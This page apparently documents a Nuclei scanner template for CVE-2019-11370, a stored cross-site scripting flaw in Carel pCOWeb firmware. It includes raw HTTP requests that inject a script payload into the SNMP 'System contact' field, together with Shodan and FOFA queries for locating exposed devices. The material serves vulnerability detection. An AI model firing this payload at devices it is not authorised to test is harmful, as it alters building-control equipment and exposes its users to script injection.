Carel pCOWeb <B1.2.4 - Cross-Site Scripting
ID: CVE-2019-11370
Severity: medium
Author: arafatansari
Tags: cve,cve2019,pcoweb,xss,carel,edb
Description
Section titled “Description”Carel pCOWeb prior to B1.2.4 is vulnerable to stored cross-site scripting, as demonstrated by the config/pw_snmp.html “System contact” field.
YAML Source
Section titled “YAML Source”id: CVE-2019-11370
info: name: Carel pCOWeb <B1.2.4 - Cross-Site Scripting author: arafatansari severity: medium description: | Carel pCOWeb prior to B1.2.4 is vulnerable to stored cross-site scripting, as demonstrated by the config/pw_snmp.html "System contact" field. impact: | Allows attackers to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions. remediation: | Apply the latest patch or upgrade to a version that addresses the vulnerability. reference: - https://www.exploit-db.com/exploits/46897 - https://github.com/nepenthe0320/cve_poc/blob/master/CVE-2019-11370 - https://nvd.nist.gov/vuln/detail/CVE-2019-11370 - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2019-11370 cwe-id: CWE-79 epss-score: 0.17043 epss-percentile: 0.96067 cpe: cpe:2.3:o:carel:pcoweb_card_firmware:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: carel product: pcoweb_card_firmware shodan-query: - http.html:"pCOWeb" - http.html:"pcoweb" fofa-query: body="pcoweb" tags: cve,cve2019,pcoweb,xss,carel,edb
http: - raw: - | POST /config/pw_snmp_done.html HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
%3Fscript%3Asetdb%28%27snmp%27%2C%27syscontact%27%29=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E - | GET /config/pw_snmp.html HTTP/1.1 Host: {{Hostname}}
matchers: - type: dsl dsl: - 'contains(body_2, "text/html")' - status_code_2 == 200 - contains(body_2, 'value=\"\"><script>alert(document.domain)</script>\"></td>') condition: and# digest: 4a0a004730450220355bcd30f5c496121c46ef838cee8a2abdfa695b2e6762f57fcd0e1423838c320221008b88ae1182b155b5d6da9b2873953083b1230a2b765fd05a1500583193e21c1a:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2019/CVE-2019-11370.yaml"